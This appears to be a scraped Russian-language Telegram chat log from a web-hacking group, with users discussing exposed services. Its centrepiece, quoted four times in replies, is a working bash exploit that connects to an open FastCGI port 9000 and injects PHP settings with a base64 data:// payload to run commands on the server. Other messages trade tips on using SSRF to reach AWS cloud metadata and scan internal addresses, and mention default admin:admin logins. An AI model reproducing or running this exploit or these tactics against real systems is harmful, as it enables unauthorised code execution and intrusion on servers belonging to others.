Size: a a a

2020 November 09

A

Architector in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
источник

X

XRUST in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
на 9000 еще по умолчанию https://www.sonarqube.org/
источник

TB

Thai Bo in WebPwnChat
Господа, не сильно шарю за ssrf. Даст в А запись file:/// запихать? Тачка на винде. Нашёл только aws на 169.х.х.х
источник

B

Bo🦠oM in WebPwnChat
В A только ип
источник

TB

Thai Bo in WebPwnChat
Bo🦠oM
В A только ип
Ага, спецом твою статью читал
источник

B

Bo🦠oM in WebPwnChat
в cname хоть небо
источник

B

Bo🦠oM in WebPwnChat
Но не сработает(
источник

n

ninja01 in WebPwnChat
Thai Bo
Господа, не сильно шарю за ssrf. Даст в А запись file:/// запихать? Тачка на винде. Нашёл только aws на 169.х.х.х
А че за iam юзер ты смотрел?
источник

TB

Thai Bo in WebPwnChat
ninja01
А че за iam юзер ты смотрел?
404. Надеялся на это. Ну зашёл на ip. Там я так понял по типу index-of, по всем папкам пошарился
источник

n

ninja01 in WebPwnChat
Thai Bo
404. Надеялся на это. Ну зашёл на ip. Там я так понял по типу index-of, по всем папкам пошарился
Все пути технические смотрел?
источник

n

ninja01 in WebPwnChat
Иногда к каким-то могут доступ ограничивать
источник

TB

Thai Bo in WebPwnChat
Имеет смысл по маске все ip чекнуть? Через aws в конфиге узнал internal ip
источник

n

ninja01 in WebPwnChat
Thai Bo
404. Надеялся на это. Ну зашёл на ip. Там я так понял по типу index-of, по всем папкам пошарился
источник

TB

Thai Bo in WebPwnChat
Ага
источник

T

Tim in WebPwnChat
XRUST
на 9000 еще по умолчанию https://www.sonarqube.org/
Забавно совпало, тут как раз винят его в утечке сорцов:
https://t.me/alexmakus/3714
источник

X

XRUST in WebPwnChat
он самый)
источник

X

XRUST in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
как всегда admin:admin а потом ФБР пишет хакеры украли и тд
источник

MT

Mariia Tiurina in WebPwnChat
XRUST
на 9000 еще по умолчанию https://www.sonarqube.org/
Тоже хотела написать
источник

ДТ

Дональд Трамп... in WebPwnChat
ID:0
Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
   OUTPUT=$(mktemp)
   env -i \
     PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
     SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
     cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

   cat $OUTPUT
done


Или воспользоваться более мощным клиентом, например, таким.
не понял почему nmap не опознает порт 9000 если на скрине он есть
источник

B

Bo🦠oM in WebPwnChat
Дональд Трамп
не понял почему nmap не опознает порт 9000 если на скрине он есть
Потому что мало пользуешься nmap’ом
источник